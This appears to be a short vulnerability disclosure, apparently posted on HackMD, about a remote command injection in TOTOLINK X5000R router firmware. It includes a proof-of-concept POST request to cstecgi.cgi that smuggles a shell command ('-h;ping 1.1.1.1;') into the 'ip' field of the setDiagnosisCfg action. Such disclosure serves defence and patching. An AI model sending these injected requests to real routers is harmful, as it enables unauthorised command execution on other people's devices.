vendor:TOTOLINK
product:X5000R;
version:X5000R(V9.1.0u.6118_B20201102)
type:Remote Command Execution
author:Jinwen Zhou、Yifeng Li、Yongjie Zheng
institution:potatso@scnu、feng@scnu、eifiz@scnu
We found an Command Injection vulnerability and buffer overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
In this function,ip
is directly passed by the attacker, so we can control the ip
to attack the OS.
We set the value of ip
as -h;ping 1.1.1.1; and the router will excute ping command,such as:
POST http://example.com/cgi-bin/cstecgi.cgi?action=s
{"topicurl":"setDiagnosisCfg","ip":"-h;ping 1.1.1.1;","num":"500"}
or
or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up
Syntax | Example | Reference | |
---|---|---|---|
# Header | Header | 基本排版 | |
- Unordered List |
|
||
1. Ordered List |
|
||
- [ ] Todo List |
|
||
> Blockquote | Blockquote |
||
**Bold font** | Bold font | ||
*Italics font* | Italics font | ||
~~Strikethrough~~ | |||
19^th^ | 19th | ||
H~2~O | H2O | ||
++Inserted text++ | Inserted text | ||
==Marked text== | Marked text | ||
[link text](https:// "title") | Link | ||
 | Image | ||
`Code` | Code |
在筆記中貼入程式碼 | |
```javascript var i = 0; ``` |
|
||
:smile: | ![]() |
Emoji list | |
{%youtube youtube_id %} | Externals | ||
$L^aT_eX$ | LaTeX | ||
:::info This is a alert area. ::: |
This is a alert area. |
On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?
Please give us some advice and help us improve HackMD.
Syncing